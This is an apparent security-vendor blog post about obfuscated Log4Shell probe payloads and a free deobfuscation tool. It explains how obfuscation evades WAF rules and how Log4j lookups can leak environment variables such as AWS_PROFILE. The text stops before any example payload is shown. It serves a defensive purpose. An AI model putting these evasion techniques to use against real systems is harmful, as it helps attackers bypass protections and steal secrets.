Since the Log4j vulnerability discovery a few weeks ago, many Oxeye customers have experienced unauthorized attempts to probe their apps for Log4Shell instances. Some probes employed obfuscated payloads.
Threat actors tend to apply obfuscation techniques to their payloads for several reasons. Most security protection tools, such as web application firewalls (WAFs), rely on rules to match malicious patterns. By using obfuscated payloads, threat actors are able to circumvent the rules logic and bypass security measures. Moreover, obfuscated payloads increase analysis complexity and, depending upon the degree of obfuscation, can also prevent them from being reverse-engineered.
Decoding and analyzing obfuscated payloads is time-consuming and often results in inaccurate data. However, doing so is crucial for understanding attackers’ intentions.
To help our customers and the AppSec community at large, Oxeye developed an effective, free tool that deobfuscates Log4Shell payloads.
The Log4j library has a few unique lookup functions that permit users to look up environment variables, Java process runtime information, and so forth. These enable threat actors to probe for specific information that can uniquely identify a compromised machine they’ve targeted.
For example, the following payload demonstrates how miscreants are able to embed the variables within payloads to extract environment variables. Here the AWS_PROFILE environment variable, used on machines interacting with the Amazon Web Services API, is incorporated into the payload: